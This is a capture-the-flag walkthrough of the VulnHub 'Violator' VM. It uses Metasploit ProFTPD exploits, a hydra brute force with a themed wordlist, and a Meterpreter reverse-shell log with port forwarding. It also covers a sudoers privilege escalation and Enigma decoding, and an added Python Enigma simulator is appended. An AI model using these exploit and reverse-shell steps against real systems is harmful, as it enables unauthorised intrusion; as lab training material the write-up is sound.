Violator walkthrough

This is how I went about solving quite a fun VM hosted at VulnHub and created by @knightmare2600.

As usual, I first import the VM into VirtualBox, change its name and finally start it:

VBoxManage import violator.ova
VBoxManage modifyvm <imported-vm-name> --name violator
VBoxManage startvm violator

I then boot my Kali VM, which I'll use to pentest the target.

DHCP gave violator the following IP: 192.168.1.162

Let's fire up nmap and see which ports look worth digging into: not much, but not nothing!

nmap -sS -PN -n -sV -sC 192.168.1.162

A quick search for known exploits shows the FTP server (ProFTPD 1.3.5) is exploitable; on top of that, a module is available in Metasploit.

searchsploit proftpd 1.3.5

So let's fire up Metasploit and see if we can use the exploit:

msfconsole
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.1.162
run

We got this error... it seems I can't write to the website path.

Let's look at the options:

show info

I see there that SITEPATH defaults to /var/www, but remember, the website runs Apache 2.4.7.

There was a VM with a blind directory traversal that drove me crazy a while ago. I used this cheatsheet to solve it and it proved very useful! According to that wiki, /var/www is indeed the default for that combination of OS (Ubuntu) and web server (Apache 2.x), but you never know.

Let's see if changing that works:

set SITEPATH /var/www/html

and... bingo, we got a shell! Not such a lucky guess after all: the Apache 2.4.7 packages shipped with Ubuntu 14.04 moved the default DocumentRoot from /var/www to /var/www/html.

Now that we're in, let's see if there is anything interesting. But first, let's grab a proper shell, since this one is painful; fortunately Python is available, along with this excellent one-liner I got from here:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now armed with a proper shell, let's dig into the VM. As expected we are the web server user; who are the others?

As you can see, almost all Depeche Mode members are here except the hint, Vince Clarke :) Looking at /etc/group reveals dg is the most interesting one, as he's part of the adm and sudo groups!

After that I dug around and tried many things that didn't work.

At first I thought the kernel might be exploitable via the overlayfs bug, but no variation found on exploit-db.com worked.

I then launched the linprivchecker.py script I use sometimes, and literally tried all the potential exploits it listed, to no avail...

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

The sudo version is not exploitable, no passwords are revealed in the /etc files, nothing obvious.

The only thing I'm still curious about is whether that .access file, owned by root and writable by anyone, is a possible threat. I couldn't find anything, but it seems suspicious enough. In fact I couldn't write to it because of a vim backup error.

[+] World Writable Files
-rw-rw-rw- 1 root root 0 Jul 9 21:06 /sys/kernel/security/apparmor/.access

At the same time, looking at the /home folder, I could find quite a lot of things.

First, a hint in /home/af/hint that says:

You are getting close… Can you crack the final enigma..?

Then a file called faith_and_devotion in /home/mg, reading:

Lyrics:
* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

And a C program in /home/af that is an Enigma machine!

It seems we need to decode an Enigma-enciphered message, and we even have the machine settings to do so; it would be nice to know what to decode, though!

I read the C source and no obvious encrypted message was inside.

So no obvious exploit, no password revealed in config files; how can we progress?

At that point I was stuck and just annoyed. The /home/dg folder also contains a bd folder owned by root, and dg is the only one in the sudo group; maybe dg can launch the executables inside, one of them being again a proftpd server!

The last option would be to brute force the passwords, if possible. I fired hydra with the bundled lists and came up with nothing; then I thought about the theme again and, well, could it be that the Lyrics hint points to album or song names of that amazing band?

So let's build a Depeche Mode list with song and album names. Wikipedia is fantastic; I've never been a fan of Depeche Mode, only know Personal Jesus and frankly wouldn't be able to quote anything else.

Let’s use those 2 URLs:

https://en.wikipedia.org/wiki/Category:Depeche_Mode_albums

https://en.wikipedia.org/wiki/Category:Depeche_Mode_songs

Now I would hate to copy-paste 68 songs by hand. Chromium has a very nice extension called XPath Helper that lets you copy the results of an XPath query. While Firebug can run XPath queries with FirePath, I'm not aware of a way to get the results into your clipboard, but if you know one I'm interested!

Let's clean it up by removing the trailing (Depeche Mode song) and (song) where applicable:

:%s/ (Depeche Mode song)//g
:%s/ (song)//g

Then let's add the same names lowercased, and lowercased without spaces, with this little snippet:

#!/usr/bin/env python
# For each name, append a lowercase copy and a lowercase copy with spaces removed.
# Note that the original, capitalized line itself is not written out.
with open('/root/Desktop/violator/depechemode', 'r') as f, \
        open('/root/Desktop/violator/depechemode.all', 'a') as fw:
    for line in f:
        l = line.lower()
        lr = l.replace(" ", "")
        fw.write(l)
        fw.write(lr)

Now let's test with hydra!

hydra -L /root/Desktop/violator/user.txt -P /root/Desktop/violator/depechemode.all -u 192.168.1.162 ftp

Hurrah, we got 3 passwords!
As mentioned earlier, dg is the most interesting as he belongs to sudo.

So let's go back to our shell and log in as dg, then sudo -l to see what dg can run. Surprise: it's /home/dg/bd/sbin/proftpd, so let's run it.

Matching Defaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dg may run the following commands on violator:
(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd

If things are as expected from reading /home/dg/bd/etc/proftpd.conf, it should listen on 2121; we'll verify that with netstat:

sudo /home/dg/bd/sbin/proftpd
netstat -tnlp

Note that this new FTP server listens on localhost, so we won't reach it from the outside and likely won't get any information from nmap on Kali unless we forward the port.

But a simple /home/dg/bd/sbin/proftpd -vv reveals that we're running:

ProFTPD Version: 1.3.3c (maint)
Scoreboard Version: 01040003
Built: Mon Jun 6 2016 21:31:03 BST

Remember the proftpd exploits list? Well, this version has a backdoor!

So let's upgrade our session to a Meterpreter one, then forward 2121 to our attacking machine (you can choose the port, I took 6666), so that we can run the new exploit with RPORT set to that port and, of course, RHOST set to 127.0.0.1.

msf exploit(proftpd_modcopy_exec) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.1.112:4433
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.1.162
[*] Meterpreter session 3 opened (192.168.1.112:4433 -> 192.168.1.162:56871) at 2016-07-10 19:17:19 +0100
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(proftpd_modcopy_exec) >
msf exploit(proftpd_modcopy_exec) > sessions -l
Active sessions
===============
  Id  Type                   Information                                                                  Connection
  --  ----                   -----------                                                                  ----------
  2   shell unix                                                                                          192.168.1.112:4444 -> 192.168.1.162:39653 (192.168.1.162)
  3   meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ violator   192.168.1.112:4433 -> 192.168.1.162:56871 (192.168.1.162)
msf exploit(proftpd_modcopy_exec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > portfwd add -L 127.0.0.1 -l 6666 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:6666 <-> 127.0.0.1:2121
meterpreter >
Background session 3? [y/N]
msf exploit(proftpd_modcopy_exec) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(proftpd_133c_backdoor) > set CMD touch /tmp/amiroot
CMD => touch /tmp/amiroot
msf exploit(proftpd_133c_backdoor) > set RPORT 6666
RPORT => 2121
msf exploit(proftpd_133c_backdoor) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(proftpd_133c_backdoor) > run
[*] Started reverse TCP double handler on 127.0.0.1:4444
[*] Sending Backdoor Command
[*] Exploit completed, but no session was created.

Now we have a /tmp/amiroot file owned by root. Let's abuse this by placing a file in /etc/sudoers.d that allows dg everything!

We first create a temporary file /tmp/dg with the required permissions; the exploit will then move it and set the right owner, root hopefully.

Let's verify whether this worked!! Success, we're root :)

Let's now inspect the /root folder: we get the flag in it, plus a hidden folder basildon which contains a rar file called crocs.rar.

I installed scp to pull that rar file onto my Kali machine and tried to open it; unfortunately it's password protected...

John saves us and gives us the hash, so let's crack it. It took me some time to realise that my depechemode.all didn't contain the original song names as parsed from Wikipedia, whereas the password is a properly capitalized song name.

We now have nice album artwork; does it contain the Enigma message?

Sure it does, in the Copyright field. Let's see if, with the faith_and_devotion instructions found above, we can recover the final flag.

Success! Here it is, properly spaced :)

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE
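To show what the faith_and_devotion settings actually do to a message, here is an added Python Enigma simulator; it is not the C program from /home/af nor any code from the original post. Rotor and reflector wirings are the historical Enigma I tables, and the rotor order I II III is an assumption since the hint only says "3 rotors"; the ciphertext itself lives in the image metadata, so the check below enciphers the recovered plaintext and deciphers it again on a freshly set machine.

```python
import string
# Historical Enigma I rotor wirings (output letter for input A..Z) and turnover notches.
ROTORS = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
}
REFLECTOR_B = "YRUHQSLDPXNGOKMIEBFZCWVJAT"

class Enigma:
    def __init__(self, rotors, positions, rings, plugs, reflector=REFLECTOR_B):  # rotors left to right
        self.wiring = [ROTORS[r][0] for r in rotors]
        self.notch = [ord(ROTORS[r][1]) - 65 for r in rotors]
        self.pos = [ord(c) - 65 for c in positions]   # "Initial": letters in the windows
        self.ring = [ord(c) - 65 for c in rings]      # "Alphabet Ring" settings
        self.reflector = reflector
        self.plug = {c: c for c in string.ascii_uppercase}
        for a, b in (p.split("-") for p in plugs):   # "Plug Board" pairs such as A-B
            self.plug[a], self.plug[b] = b, a
    def _step(self):
        # Right rotor steps every key press; the middle one steps when the right rotor
        # is at its notch and double-steps (dragging the left rotor) at its own notch.
        if self.pos[1] == self.notch[1]:
            self.pos[1] = (self.pos[1] + 1) % 26
            self.pos[0] = (self.pos[0] + 1) % 26
        elif self.pos[2] == self.notch[2]:
            self.pos[1] = (self.pos[1] + 1) % 26
        self.pos[2] = (self.pos[2] + 1) % 26
    def _rotor(self, i, c, forward):
        offset = (self.pos[i] - self.ring[i]) % 26    # ring setting shifts the wiring
        x = (c + offset) % 26
        y = ord(self.wiring[i][x]) - 65 if forward else self.wiring[i].index(chr(x + 65))
        return (y - offset) % 26
    def _press(self, letter):
        self._step()
        c = ord(self.plug[letter]) - 65
        for i in (2, 1, 0):                           # right -> middle -> left
            c = self._rotor(i, c, True)
        c = ord(self.reflector[c]) - 65
        for i in (0, 1, 2):                           # back out, left -> right
            c = self._rotor(i, c, False)
        return self.plug[chr(c + 65)]
    def run(self, text):
        # Enciphers or deciphers (the machine is reciprocal); non-letters are dropped.
        return "".join(self._press(ch) for ch in text.upper() if ch in string.ascii_uppercase)

def violator_machine():
    # Settings from /home/mg/faith_and_devotion; rotor order I II III is an assumption.
    return Enigma(["I", "II", "III"], positions="ABC", rings="CBA", plugs=["A-B", "C-D"])
```

Because the machine is reciprocal, the same settings that produced the copyright string turn it back into the message above; note that, as with any Enigma, no letter ever enciphers to itself.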

Thanks to @knightmare2600 for this fun VM; good message at the end.

Edit: I didn't even notice there was another final challenge; I thought it was a troll, but a little tweet from the author revealed it. I'll let you find it by yourself; one has to be a real fan of Depeche Mode to be that precise!
